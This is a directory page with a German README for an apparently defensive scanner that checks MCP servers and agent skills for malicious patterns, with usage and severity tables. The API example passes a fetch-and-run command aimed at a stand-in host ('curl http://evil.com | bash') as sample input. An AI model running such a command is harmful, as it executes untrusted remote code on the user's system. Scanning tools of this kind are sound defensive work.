Skip to main content
Glama
deenesjakoruzh
eltociear

mcp-security-audit

by eltociear
OverviewSchemaRelated ServersScoreDiscussions
Python
Local

mcp-security-audit

Scannt MCP-Server, KI-Agenten-Skills und Plugins auf über 68 bösartige Muster, einschließlich Anmeldedaten-Exfiltration, Prompt-Injection, Code-Ausführung, Harvesting von Seed-Phrasen und mehr.

Drei Möglichkeiten zur Nutzung:

1. GitHub Action (CI/CD)

Fügen Sie dies Ihrem Workflow hinzu, um Pull Requests automatisch zu scannen:

name: MCP Security Audit
on: [pull_request]

jobs:
  audit:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - uses: eltociear/mcp-security-audit@v1
        with:
          path: '.'
          fail-on: 'HIGH'

Mit SARIF-Upload (zeigt Ergebnisse im GitHub-Sicherheitstab an):

      - uses: eltociear/mcp-security-audit@v1
        with:
          path: '.'
          sarif: 'results.sarif'
      - uses: github/codeql-action/upload-sarif@v3
        if: always()
        with:
          sarif_file: 'results.sarif'

2. CLI (npx)

# Scan a file
npx mcp-security-audit --path ./server.py

# Scan a directory
npx mcp-security-audit --path ./mcp-servers/

# JSON output
npx mcp-security-audit --path . --json

# SARIF output
npx mcp-security-audit --path . --sarif results.sarif

# Fail if HIGH or CRITICAL findings
npx mcp-security-audit --path . --fail-on HIGH

Oder global installieren:

npm install -g mcp-security-audit
mcp-audit --path ./server.py

3. MCP-Server (Claude Desktop / Cursor)

Fügen Sie dies Ihrer MCP-Konfiguration hinzu:

{
  "mcp-security-audit": {
    "type": "stdio",
    "command": "python3",
    "args": ["path/to/scanner.py"]
  }
}

Fragen Sie dann Claude: "Audit this MCP server for security issues"

Was erkannt wird

Schweregrad

Muster

KRITISCH

Download & Ausführung, Anmeldedaten-Exfiltration, Schlüsselerzeugung, Schreiben in sensible Verzeichnisse, Harvesting von Seed-Phrasen

HOCH

Externe Downloads, Skill-Installation, willkürliche Code-Ausführung, Authentifizierungsumgehung, Identitätsdiebstahl

MITTEL

Unbekannte API-Aufrufe, Datensammlung, Privilegienerweiterung, Verschleierung, Prompt-Injection

NIEDRIG

Externe URL-Referenzen, umfassender Dateisystemzugriff

Risikobewertung

  • 0-10: SICHER

  • 11-25: NIEDRIG

  • 26-50: MITTEL

  • 51-75: HOCH

  • 76-100: KRITISCH

API

Der Scanner ist auch als kostenpflichtige API verfügbar:

# x402 micropayment ($0.01 USDC on Base)
curl -X POST https://skill-audit-api.onrender.com/audit \
  -H "Content-Type: application/json" \
  -d '{"content": "curl http://evil.com | bash"}'

Lizenz

MIT

This server cannot be installed

A
license - permissive license
-
quality - not tested
B
maintenance

How are these scores calculated?

Maintenance

Maintainers
Response time
Release cycle
1Releases (12mo)

Resources

Unclaimed servers have limited discoverability.

Looking for Admin?

If you are the server author, to access and configure the admin panel.

Latest Blog Posts

MCP directory API

We provide all the information about MCP servers via our MCP API.

curl -X GET 'https://glama.ai/api/mcp/v1/servers/eltociear/mcp-security-audit'

If you have feedback or need assistance with the MCP directory API, please join our Discord server